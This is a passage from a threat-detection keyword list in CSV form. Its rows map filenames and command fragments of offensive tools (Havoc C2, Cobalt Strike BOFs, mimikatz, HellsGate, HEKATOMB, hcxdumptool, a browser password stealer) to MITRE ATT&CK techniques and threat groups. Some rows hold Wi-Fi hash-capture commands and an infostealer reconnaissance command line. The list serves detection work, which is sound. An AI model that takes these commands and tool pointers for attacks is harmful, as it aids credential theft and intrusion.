TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc.agent*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc.git*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc.hpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable 
post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc.service*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc.yaotl*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/Client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/cmd/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/payloads*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/pkg*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/Teamserver*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_agent.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_agent_talon.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_default.yaotl*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_externalc2*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_service_connect*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc-c2-client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc-c2-data*,offensive_tool_keyword,havoc,Havoc is a modern 
and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havocframework.com*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocService*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocTalonInteract*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocUi.cpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocUi.h*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocUI.hpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*hccapx2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*hci_oracle_passwords*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hcxdumptool*,offensive_tool_keyword,hcxdumptool,Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. 
Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted,T1040 - T1560 - T1539,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/ZerBea/hcxdumptool,1,1,N/A,N/A,10,1553,374,2023-10-02T15:51:15Z,2018-02-25T08:18:40Z -*hcxhashtool -i *.hashcat --info stdout*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hcxpcapngtool --all -o *.hashcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hcxpcapngtool -o *.hashcat *.pcapng*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hd-launch-cmd *,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*headers/exploit.h*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*headers/HandleKatz.h*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,,N/A,,, -*--headless --disable-gpu --disable-logging --dump-dom https://getip.pro*,greyware_tool_keyword,ducktail,infostealer command to retrieve public ip address,T1596 - T1590.005,TA0043 - TA0007 - TA0009,Ducktail ,N/A,Reconnaissance,https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*HeapCrypt-main*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.cpp*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.exe*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.sln*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.vcxproj*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeartBleed*,offensive_tool_keyword,HeartBleed,Heart Bleed scanner ,T1222 - T1110 - T1046,TA0007 - TA0001 - TA0002,N/A,N/A,Web Attacks,https://github.com/TechnicalMujeeb/HeartBleed,1,0,N/A,N/A,1,26,4,2018-04-14T04:21:39Z,2018-04-14T04:06:16Z -*hekatomb-*.tar.gz*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb*-hashes *,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,0,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb-*-py3-none-any.whl*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb@thiefin.fr*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Hello from DCShadow*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Hello From sadsad Team*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*HelloReflectionWorld.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*hellsgate.asm*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*HellsGate.exe*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*HellsGate.sln*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*HellsGate.vcxproj*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*help\dll.txt*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*helpers.gpoddity_smbserver*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*Henkru/cs-token-vault*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*henry-richard7/Browser-password-stealer*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*Heroinn FTP*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,0,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_client*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
